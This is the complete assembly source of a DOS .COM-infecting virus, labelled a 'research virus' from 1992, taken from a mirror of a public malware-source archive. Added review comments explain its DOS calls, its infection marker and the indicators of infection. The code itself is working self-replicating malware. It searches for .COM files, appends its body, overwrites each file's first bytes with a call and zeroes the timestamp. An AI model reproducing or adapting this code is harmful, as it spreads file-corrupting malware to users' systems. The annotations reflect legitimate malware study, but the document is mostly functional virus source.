mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.189.asm
2021-01-12 17:29:01 -06:00



;***************************************************************************
;* *
;* 196 - Research Virus Version 1.01 Date: 11th April 1992. *
;* *
;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
;* *
;* Non-Overwriting Version of 97 Virus *
;* *
;***************************************************************************
;---------------------------------------------------------------------------
; Analysis notes (review)
;
; Target:  16-bit real-mode DOS .COM image (org 100h, one CODE segment).
; Syntax:  MASM/TASM-style directives (Segment / Assume / ENDS / END and the
;          `offset` operator). The page labels the file "NASM"; it is not
;          NASM syntax and will not assemble unchanged under NASM.
; Layout:  highlander            3-byte launcher standing in for a host's
;                                first three bytes (call vir_start)
;          vir_start..vir_end    the body that is appended to a host file
;          variables_start       jump_add (3 bytes), old_code (3 bytes),
;                                fcb ("*.COM",0) - the data the body carries
;
; Observable behaviour, taken from the INT 21h functions used below:
;   4Eh/4Fh  FindFirst/FindNext for "*.COM" in the current directory, CX=0
;   2Fh      Get DTA; the low three bits of the DTA time word (DTA+22) act
;            as the "already processed" marker - a zero value skips the file
;   3D02h    open read/write; 3Fh read 3 bytes; 4202h seek to end of file
;   40h      write virus_size bytes at end of file, then 3 bytes at offset 0
;   5701h    set the file's time and date to zero (CX=DX=0) before 3Eh close
;   4Ch      terminate. There is no jump to the host bytes restored at 100h,
;            so an infected program's original code is never executed here.
;
; Indicators that follow from the code (not from field data):
;   - .COM files whose DOS date and time stamp is all zero
;   - the original first three bytes of the host stored inside the appended
;     block (old_code) rather than at offset 0
;   - file size grown by exactly virus_size (vir_end-vir_start) bytes
;
; NOTE(review): the hosting page flags invisible Unicode characters in this
; file; they are not visible in this listing. Compare the bytes with an
; independent copy before treating this text as authoritative.
;---------------------------------------------------------------------------
CODE Segment
Assume CS:CODE
progr equ 100h ;load offset of a .COM image
org progr
virus_size EQU vir_end-vir_start ;number of bytes appended to a host
variable_diff EQU variables_start-next_byte ;distance from next_byte to the data area
;
; highlander: occupies the first three bytes of the image. In this research
; build it is a launcher that calls the body and then exits via 4Ch.
;
highlander:
call vir_start ;call virus
mov ah,4ch ;return to operating system
int 21h ;thru' dos interrupt 21h
;
; vir_start: entry of the appended body. The body sits at a host-dependent
; offset, so it finds its own position from the return address that
; 'call next_byte' pushes (call/pop delta) instead of assembled offsets.
; Stack on entry to next_byte: [sp] = offset of next_byte,
;                              [sp+2] = return address of the call at 100h.
;
vir_start:
call next_byte ;call next address
next_byte:
pop ax ;ax = runtime offset of next_byte
pop di ;di = return address of the 3-byte call at the image start (103h)
push ax ;save virus address
pop si ;si = offset of next_byte
mov ax,variable_diff ;add difference
add si,ax ;si = variables_start (jump_add)
mov ax,3 ;move to old address
sub di,ax ;di = 100h, start of the .com image
add si,ax ;si = old_code, the saved original three bytes
; restore the host's original first three bytes in memory at 100h..102h
mov ax,[si] ;get two bytes from old code
mov [di],ax ;and place at start of file
inc si ;increment to third byte
inc si ;
inc di ;increment to third address to save
inc di ;
mov al,[si] ;get last byte of old code
mov [di],al ;and place at start of .COM file
mov ax,5 ;five bytes out
sub si,ax ;si = variables_start again
mov di,si ;which is copied to destination
mov ax,6 ;add 6 to variables address
add di,ax ;di = fcb, the ASCIIZ "*.COM" search pattern
;search for first
mov ah,4eh ;search for first
xor cx,cx ;attributes to search
mov dx,di ;point to fcb
int 21h ;call dos
jc return_to_prog ;no match: return_to_prog terminates via 4Ch
;
; found_one: examine the DTA entry DOS filled in. DTA+22 is the file time
; word; its low three bits are the marker this code writes itself (5701h).
;
found_one:
mov ah,2fh ;get DTA address into es:bx
int 21h ;call dos
mov ax,22 ;jump over to time
add bx,ax ;and point to it
mov al,es:[bx] ;and place in ax
and al,00000111b ;get seconds only
cmp al,00h ;zero seconds = already stamped, skip this file
jnz infect_program ;if not infect program
mov ah,4fh ;find next file
int 21h ;call dos
jmp short found_one ;jump back
;
; infect_program: DTA+30 (22+8) holds the ASCIIZ file name of the match.
;
infect_program:
mov ax,8 ;jump to asciiz fcb
add ax,bx ;add to bx
mov dx,ax ;and move to dx
mov ax,3d02h ;open file for writing
int 21h ;call dos
jnc continue ;continue if no error
mov ah,4fh ;search for next
xor cx,cx ;attributes to search
int 21h ;call dos
jc return_to_prog ;no more files: return_to_prog terminates via 4Ch
jmp short found_one ;jump forward if one found
;
; continue: ax = file handle; si = variables_start here.
;
continue:
mov bx,ax ;transfer file handle to bx
;read first three bytes
mov ah,3fh ;read file
mov cx,3 ;number of bytes to read
mov dx,3 ;three bytes to old_code
add dx,si ;point to buffer to read
int 21h ;call dos
mov ax,4202h ;move file pointer to end of file
xor cx,cx ;clear cx
xor dx,dx ;clear dx
int 21h ;call dos; dx:ax = new position = file size
dec ax ;ax = size - 3
dec ax ;
dec ax ;
dec si ;save address
mov word [si],ax ;and store
mov ah,40h ;write to file
mov cx,virus_size ;set counter to write
mov dx,offset vir_start ;point to buffer to start
int 21h ;and write to file
mov ax,4200h ;move file pointer to start of file
xor cx,cx ;clear cx
xor dx,dx ;clear dx
int 21h ;call dos
mov ah,40h ;write to file
mov cx,3 ;set counter to write
inc si ;point to jump address
mov dx,si ;point to buffer to start
int 21h ;and write to file
; stamp the file: time = 0 and date = 0. This is the value found_one
; tests for, so the stamp doubles as the "already processed" marker.
mov ax,5701h ;set date & time
xor cx,cx ;time set to zero
xor dx,dx ;and date
int 21h ;and do it
mov ah,3eh ;close file
int 21h ;thru' dos
;
; return_to_prog: terminates the process; the restored host bytes at 100h
; are not executed.
;
return_to_prog:
mov ah,4ch ;terminate program
int 21h ;exit to dos
;
; Data carried inside the appended body.
;
variables_start:
jump_add:
db 0e8h,0,0 ;CALL near rel16 opcode plus a 2-byte displacement placeholder
old_code:
db 90h,90h,90h ;three NOPs; overwritten with the host's first three bytes
fcb:
db "*.COM",0 ;ASCIIZ search pattern for 4Eh/4Fh (not an FCB despite the name)
variables_end:
vir_end:
CODE ENDS
END highlander